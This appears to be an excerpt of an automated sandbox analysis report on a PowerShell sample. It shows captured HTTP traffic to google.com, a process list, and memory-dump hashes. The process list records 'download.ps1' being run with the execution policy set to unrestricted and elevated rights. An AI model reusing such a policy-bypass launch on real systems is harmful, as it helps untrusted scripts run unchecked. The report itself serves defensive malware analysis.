                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-smbdIYF5IF9vEWyRIGM7rw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                Server: gws
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                Set-Cookie: AEC=AZ6Zc-WFUenl3sbgJYUuYJzD-LPHiTCyXKjrIxemPBFBJQMw5OyGPeLogg; expires=Wed, 18-Jun-2025 16:34:30 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                Set-Cookie: NID=520=arH3HcKuGlU-TELRbC_aXVniWLXce03RRjjrOxEmPq3mSWgUJvvcXSQVYJRMO4aFfWvDsMrxHuTQwUA_hQVHEd2tRcmscTvatBd2_xfV3Np66Nib99b2bX8lLu8FSa670p0eeRw1bZBexib06hB-q0eweL3OajnCrOtAWmcxQisWQKFdcvZJdwX-oVLxQH3vUWXQFc4j; expires=Sat, 21-Jun-2025 16:34:30 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                Accept-Ranges: none
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Data Raw: 33 62 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76
                                                                                                                                Data Ascii: 3bbd<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, v
                                                                                                                                Dec 20, 2024 17:34:30.617055893 CET224INData Raw: 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75
                                                                                                                                Data Ascii: ideos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
                                                                                                                                Dec 20, 2024 17:34:30.617075920 CET1236INData Raw: 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 6c 6f 67 6f 73 2f 64 6f 6f 64 6c 65 73 2f 32 30 32 34 2f 79 65 61 72 2d 69 6e 2d 73 65 61 72 63 68 2d 32 30 32 34 2d 67 6c 6f 62 61 6c 2d 36 37 35 33 36 35 31 38 33 37 31 31 30 36 34 39 2e 34 2d 6c
                                                                                                                                Data Ascii: <meta content="/logos/doodles/2024/year-in-search-2024-global-6753651837110649.4-l.png" itemprop="image"><meta content="Year in Search 2024" property="twitter:title"><meta content="Year in Search 2024! #GoogleDoodle" property="twitter:descript
                                                                                                                                Dec 20, 2024 17:34:30.617094040 CET1236INData Raw: 32 31 33 36 37 34 2c 35 38 33 2c 35 39 39 32 32 37 30 2c 32 38 34 32 37 33 39 2c 32 31 2c 37 34 33 38 30 31 36 2c 32 30 35 33 39 39 33 38 2c 32 35 32 32 34 30 34 35 2c 33 33 39 36 2c 31 32 34 30 2c 31 36 34 33 36 2c 38 34 30 34 35 2c 32 32 36 32
                                                                                                                                Data Ascii: 213674,583,5992270,2842739,21,7438016,20539938,25224045,3396,1240,16436,84045,22623,884,14280,8181,5934,43496,9235,9776,2664,3430,3319,23878,9139,740,1,3,2333,1523,328,4456,1769,23407,6,2871,7339,687,7851,22,21982,1134,207,13708,8210,3286,4134
                                                                                                                                Dec 20, 2024 17:34:30.617114067 CET1236INData Raw: 29 7b 76 61 72 20 61 3b 28 28 61 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f 30 3a 61 2e 73 74 76 73 63 29 3f 67 6f 6f 67 6c 65 2e 6b 45 49 3d 5f 67 2e 6b 45 49 3a 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 5f 67 3b 7d 29 2e
                                                                                                                                Data Ascii: ){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var g=this||self;function k(){return window.google&&window.google.kOPI||null};var
                                                                                                                                Dec 20, 2024 17:34:30.617408037 CET1236INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d 3b 76 61 72 20 64 3b 28 64 3d 67 6f 6f 67 6c 65 29 2e 78 7c 7c 28 64 2e 78 3d 66 75 6e 63 74 69 6f 6e 28 61
                                                                                                                                Data Ascii: all(this);(function(){google.y={};google.sy=[];var d;(d=google).x||(d.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(google.y[c])}google.y[c]=[a,b];return!1});var e;(e=google).sx||(e.sx=function(a){google.sy.push(a)});google.lm=
                                                                                                                                Dec 20, 2024 17:34:30.617424965 CET1236INData Raw: 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b
                                                                                                                                Data Ascii: ite-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidden;z-index:998;right:0}.gbto #gbs{background:#fff}#gbx3,#gbx4{b
                                                                                                                                Dec 20, 2024 17:34:30.617459059 CET1236INData Raw: 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61
                                                                                                                                Data Ascii: lute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.
                                                                                                                                Dec 20, 2024 17:34:30.617476940 CET1236INData Raw: 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 2e 67 62 74 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e
                                                                                                                                Data Ascii: :inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weig
                                                                                                                                Dec 20, 2024 17:34:30.617958069 CET1236INData Raw: 35 70 78 20 31 70 78 7d 23 67 62 69 34 69 2c 23 67 62 69 34 69 64 7b 6c 65 66 74 3a 35 70 78 3b 62 6f 72 64 65 72 3a 30 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 70 78 3b 77 69 64
                                                                                                                                Data Ascii: 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpi
                                                                                                                                Dec 20, 2024 17:34:30.737891912 CET1236INData Raw: 61 64 64 69 6e 67 3a 30 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2d 68 76 72 2c 2e 67 62 6d 6c 31 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 21 69 6d 70 6f
                                                                                                                                Data Ascii: adding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decorati


                                                                                                                                Click to jump to process

                                                                                                                                Click to jump to process

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Click to jump to process

                                                                                                                                Target ID:0
                                                                                                                                Start time:11:34:18
                                                                                                                                Start date:20/12/2024
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:1
                                                                                                                                Start time:11:34:18
                                                                                                                                Start date:20/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Reset < >
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8d5fcae22ea28c8323ea77c34340e2184ca94cd6703109c7b58e9ed0235d8701
                                                                                                                                  • Instruction ID: 4358fe4eef5b1222f13b465c031b29f4869a0591229a3faa5469826aa8f85686
                                                                                                                                  • Opcode Fuzzy Hash: 8d5fcae22ea28c8323ea77c34340e2184ca94cd6703109c7b58e9ed0235d8701
                                                                                                                                  • Instruction Fuzzy Hash: 39F1923091CA8D8FEBA8EF28C8557E977E1FF54340F04426EE84DC7296CB7499458B86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d914cd7465761a01815a5093cc2daa1c6992d10bc30405a1d8587b9dfa932069
                                                                                                                                  • Instruction ID: 3a2d9aab4d488a6eeb4631b68cc0434014ff4c91904a6d8b5c8c9efb2cbb4a3f
                                                                                                                                  • Opcode Fuzzy Hash: d914cd7465761a01815a5093cc2daa1c6992d10bc30405a1d8587b9dfa932069
                                                                                                                                  • Instruction Fuzzy Hash: C6E1C33091CA4E8FEBA8EF28C8567E977D1FF54351F44466ED84DC7292CB7898418B82
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %Y_H
                                                                                                                                  • API String ID: 0-2430672150
                                                                                                                                  • Opcode ID: e60df55a78d3979cf3615a076ad32a71475853517e4fa8e1c19ed5c96feae98e
                                                                                                                                  • Instruction ID: 64400d372a2daa50004d38ba776c2255e0073de1077d95878411c289092d7987
                                                                                                                                  • Opcode Fuzzy Hash: e60df55a78d3979cf3615a076ad32a71475853517e4fa8e1c19ed5c96feae98e
                                                                                                                                  • Instruction Fuzzy Hash: 0D12F330A0CA4D8FDB89EF18C485AB97BF1FF69750F1401AAD449D7296DB24EC86C781
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2242421851.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d1977948b4f0b300eefd7ce818e871983bf61b7bf74fb1d02fb5cb470eb55fcb
                                                                                                                                  • Instruction ID: a933b245b8290ed60fdee8da69a86be1f7ca498db0d8a45452c9fc12736c6656
                                                                                                                                  • Opcode Fuzzy Hash: d1977948b4f0b300eefd7ce818e871983bf61b7bf74fb1d02fb5cb470eb55fcb
                                                                                                                                  • Instruction Fuzzy Hash: BFA17462D4DBD68FEB6BAA3858655643FB0EF63250B1940FBC088CB0E3E95D9C46C351
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6b8056c27ac0d5e5044f6e530b9811c2da8098e4712c5ff5cda0d072570162cd
                                                                                                                                  • Instruction ID: fa9c5f2f8e29a0b4672d9e692ee2307c387e88f3ce99a5c1fe02bc0340157c3d
                                                                                                                                  • Opcode Fuzzy Hash: 6b8056c27ac0d5e5044f6e530b9811c2da8098e4712c5ff5cda0d072570162cd
                                                                                                                                  • Instruction Fuzzy Hash: 92B1C43051CA8D4FEB68EF28C8557EA7BE1FF55350F44426EE84DC7292CB3498458B86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6efc42a8338cbdcf0fc7ba3766d72168d40f29fd2f83c0d83c554a09635bd301
                                                                                                                                  • Instruction ID: 8d26b79a9cf5f1c64b940ebe7630d993d7d9c001c954b9f1a52e1685a2237052
                                                                                                                                  • Opcode Fuzzy Hash: 6efc42a8338cbdcf0fc7ba3766d72168d40f29fd2f83c0d83c554a09635bd301
                                                                                                                                  • Instruction Fuzzy Hash: F331E831D1E6C24FE31797A81C145A6BFB0FF93650B0942FBD0998B1EBDA14580983AA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 73f5dfd55ed97fa02a9893806580d86c08623acb2daa419fc147a2cd703fc14b
                                                                                                                                  • Instruction ID: 96039bf9c79cc1f76fbfb1a7c5618a7fcbe67b3041860431ab948035f4abe458
                                                                                                                                  • Opcode Fuzzy Hash: 73f5dfd55ed97fa02a9893806580d86c08623acb2daa419fc147a2cd703fc14b
                                                                                                                                  • Instruction Fuzzy Hash: 46118C3180E7C98FD707AB745C29094BFB09F63250F0902EBD088CB0F3D6295819C7A6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2242421851.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 718103e30508fdbe56d824cc6d97d3f0698973c56003ec69036aa210b575fbaf
                                                                                                                                  • Instruction ID: bf274e1927e55c4001b70cd57f35afe7cfe0811f27136743241eaa5bdabc419d
                                                                                                                                  • Opcode Fuzzy Hash: 718103e30508fdbe56d824cc6d97d3f0698973c56003ec69036aa210b575fbaf
                                                                                                                                  • Instruction Fuzzy Hash: 2531A721A0DBC58FDBABDE2888655643BB5EF67310B0901EAC489CB1A3E929DC45C751
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2239247248.00007FF848E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E2D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e2d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e9289ff47dc647e221c7f55d862cf5c5a115b8af1d7744b66b0263369b10b597
                                                                                                                                  • Instruction ID: 78bdc3b6426eba30f661e41831318548b539849754789ed42c968db53aa67657
                                                                                                                                  • Opcode Fuzzy Hash: e9289ff47dc647e221c7f55d862cf5c5a115b8af1d7744b66b0263369b10b597
                                                                                                                                  • Instruction Fuzzy Hash: D341027080DBC48FE7569B2998559523FF0FF56360F1505DFD088CB1A3D629A84AC7A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 615522ebc2b087a52e3cbc45dc7eb8cf71d2fcc9e01de39be5f53f65237734aa
                                                                                                                                  • Instruction ID: ad086729ca10e0e6e9f0efdb43c821fab3c82279743e71b80719bf964641ed44
                                                                                                                                  • Opcode Fuzzy Hash: 615522ebc2b087a52e3cbc45dc7eb8cf71d2fcc9e01de39be5f53f65237734aa
                                                                                                                                  • Instruction Fuzzy Hash: 5631E83191CB889FDB18DB5C9C066A9BBF0FB99710F00426FE449C3692DB74A855CBD2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a8efca2a577853baf633abb367503a90ed82bb7a41f0f6a02c766897746528fd
                                                                                                                                  • Instruction ID: a8373d44b1043ebcc1702c28068e984cdb76f41c10a4f454cd5007655f9086f5
                                                                                                                                  • Opcode Fuzzy Hash: a8efca2a577853baf633abb367503a90ed82bb7a41f0f6a02c766897746528fd
                                                                                                                                  • Instruction Fuzzy Hash: 2E21293190CA4C4FDB58DFACD84A7E9BBE0EB95321F04426FD048C3196D774A44ACB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5030ca31c444c0dab9876e2180c78b3c5d4fa9a0054614c342cf5b03fb90ed83
                                                                                                                                  • Instruction ID: 6721d3065ce7c1467ea80e1bc253597c4d5edf36501eec2e692b142a2a3f8f1c
                                                                                                                                  • Opcode Fuzzy Hash: 5030ca31c444c0dab9876e2180c78b3c5d4fa9a0054614c342cf5b03fb90ed83
                                                                                                                                  • Instruction Fuzzy Hash: A3311730919A4E9EFBB4EB18CC0ABF972D4FF41358F404139D84D861D3CB386A85CA59
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 992f195512c971f49469e0ecea812c0d9e71d7d3947c1ecfbb816604722e8fed
                                                                                                                                  • Instruction ID: 8834e28298de111377aa9ec23b504a3f641ecfc20c110cc56e18753582502035
                                                                                                                                  • Opcode Fuzzy Hash: 992f195512c971f49469e0ecea812c0d9e71d7d3947c1ecfbb816604722e8fed
                                                                                                                                  • Instruction Fuzzy Hash: 4D01677111CB0C8FD744EF0CE451AA5B7E0FB99364F10056EE58AC3695D736E881CB45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2247535053.00007FF8491F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491F0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff8491f0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 530017c41d93d44d1a29c371a7aa8350551ea4315dbfbb5e03d34ece03e202a5
                                                                                                                                  • Instruction ID: 50502cb5c4c4c21d1b3c856fe150af15c6f8609cf278f34859d901eb0c0894d5
                                                                                                                                  • Opcode Fuzzy Hash: 530017c41d93d44d1a29c371a7aa8350551ea4315dbfbb5e03d34ece03e202a5
                                                                                                                                  • Instruction Fuzzy Hash: 5CF0F032A0C5898FE765EF0CE4518A8B3E0FF05360B1800B6E05CC706BDA2AAC018B55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2247535053.00007FF8491F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491F0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff8491f0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72d6196fc28c60dbf4129cf9931cdcf8fb3e7382e6bdc2026b6f637af4e2da2c
                                                                                                                                  • Instruction ID: 68e18882b2625cce74fd965a4cd00d94fb49829f3ba863287715919f3abc9479
                                                                                                                                  • Opcode Fuzzy Hash: 72d6196fc28c60dbf4129cf9931cdcf8fb3e7382e6bdc2026b6f637af4e2da2c
                                                                                                                                  • Instruction Fuzzy Hash: B7F09A32A0D5898FEB64EB1CA4448A8B7E0EF05360B2504B6E05EC70A7DB29AC508B51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: K_^$K_^
                                                                                                                                  • API String ID: 0-1140085333
                                                                                                                                  • Opcode ID: 603e989ba819f47cbbeb7dc26d4e26f79c600d787da663a639521e8404ffbd6f
                                                                                                                                  • Instruction ID: 2401282e657b0237d3462cbde6f10036ab3b9c6226992748597a866b2b8a5750
                                                                                                                                  • Opcode Fuzzy Hash: 603e989ba819f47cbbeb7dc26d4e26f79c600d787da663a639521e8404ffbd6f
                                                                                                                                  • Instruction Fuzzy Hash: 0A527463D0E7D29FE753AB3868A51E57FB0EF936A4B0901F7C4848F0D3EA1818468765
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -I$0-I$8-I$8-I$@-I$I$X-I$X-I$_$`-I$h-I$x-I$-I
                                                                                                                                  • API String ID: 0-4039408126
                                                                                                                                  • Opcode ID: abc3906b26845bc9042859f5085a95317a7e7a1dcffe2d00eb713cbed56eed21
                                                                                                                                  • Instruction ID: 822ba3d010d4c5f6021f329f7c42508cde37d36d9233cbe408ecb7a4931bc05d
                                                                                                                                  • Opcode Fuzzy Hash: abc3906b26845bc9042859f5085a95317a7e7a1dcffe2d00eb713cbed56eed21
                                                                                                                                  • Instruction Fuzzy Hash: 30619262D0E9C25FF3A5A77C3C591746F80FF72A60F0906FBC1485B1DFAA6499068389
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2240461910.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: K_^$K_^$K_^$K_^$K_^
                                                                                                                                  • API String ID: 0-3188868157
                                                                                                                                  • Opcode ID: 93f35461e5ab814056067dc5f22703516a26e2e4f39cbd362b1e21a8415b6d04
                                                                                                                                  • Instruction ID: fe5ec92b0a1ff5f7abda05751bbd82d9f2e3cae92342f70ded909f0d7e51c780
                                                                                                                                  • Opcode Fuzzy Hash: 93f35461e5ab814056067dc5f22703516a26e2e4f39cbd362b1e21a8415b6d04
                                                                                                                                  • Instruction Fuzzy Hash: D731E773D1DED35FE25A573858550E56BA0FF32BA5B5901F7C09CAA0C3EF196C068205